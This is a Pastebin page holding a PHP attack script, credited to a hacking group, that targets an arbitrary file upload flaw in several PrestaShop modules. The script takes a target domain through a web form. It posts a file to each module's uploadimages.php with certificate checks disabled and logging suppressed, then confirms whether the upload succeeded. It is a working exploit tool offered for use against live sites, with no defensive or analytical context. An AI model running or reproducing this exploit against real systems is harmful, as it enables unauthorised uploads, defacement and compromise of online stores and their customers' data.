Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('display_errors', 0);
- @set_time_limit(0);
- /*
- Name app : Prestashop Arbitary File Upload
- Author / Editor Script : AZZATSSINS CYBERSERKERS
- Email : [email protected]
- */
- echo"<title>Prestashop Arbitary File Upload</title><center>
- <body bgcolor=silver><u><i><b><h1>© AZZATSSINS CYBERSERKERS</h1>
- </b></i></u><br>
- <form method='post'>
- Domain: <br>
- <textarea placeholder='http://www.target.com/' name='url' style='width: 500px; height: 20px;'></textarea><br>
- <input type='submit' name='azzatssins' value='Fuck it!'>
- </form><br>";
- if($_POST['azzatssins']) {
- $site = $_POST['url'];
- $file = "ac.html";
- echo "<br><u><b>Target : ".$site."</b></u><br>";
- $expl = array("/modules/simpleslideshow/","/modules/productpageadverts/","/modules/homepageadvertise/","/modules/columnadverts/","/modules/vtemslideshow/");
- foreach($expl as $exploit){
- $post = array("userfile" => "@$file",
- );
- $azzatssins = $site.$exploit."/uploadimages.php";
- $ch2 = curl_init ($azzatssins);
- curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch2, CURLOPT_POST, 1);
- curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
- $data = curl_exec ($ch2);
- $cyberserkers = $site.$exploit."/file_uploads/".$file;
- $azzatssinscyberserkers = @file_get_contents($cyberserkers);
- if(preg_match('#AZZATSSINS#i',$azzatssinscyberserkers)){
- echo "<br> [#]Exploit Success :) <br>[#] ".$cyberserkers."<br><hr><br>";
- }else{
- echo "<br>";}
- } }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement